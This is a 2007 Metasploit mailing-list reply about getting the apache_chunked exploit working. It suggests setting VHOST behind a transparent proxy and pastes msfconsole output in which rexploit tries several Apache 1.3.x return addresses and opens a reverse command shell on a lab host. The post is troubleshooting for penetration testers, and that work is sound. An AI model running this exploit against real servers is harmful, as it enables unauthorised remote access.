Metasploit mailing list archives

Problem with Apache Win32 Chunked Encoding


From: aushack at gmail.com (Patrick Webster)
Date: Wed, 31 Oct 2007 10:23:12 +1100

Are you sending traffic via a transparent proxy? You may need to set VHOST
to get past it.

Works ok here - though a different target.

msf exploit(apache_chunked) > rcheck
[*] Serer is probably not vulnerable:
[*] The target is not exploitable.
msf exploit(apache_chunked) > rexploit
[*] Started reverse handler
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/6 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/2 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/0 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/4 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/1 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9- >1.3.19 [
0x00401151/3 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/5 ]
[*] Command shell session 1 opened (192.168.146.12:4444 ->
192.168.146.13:1050)

-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071031/45e0b980/attachment.htm>


Current thread: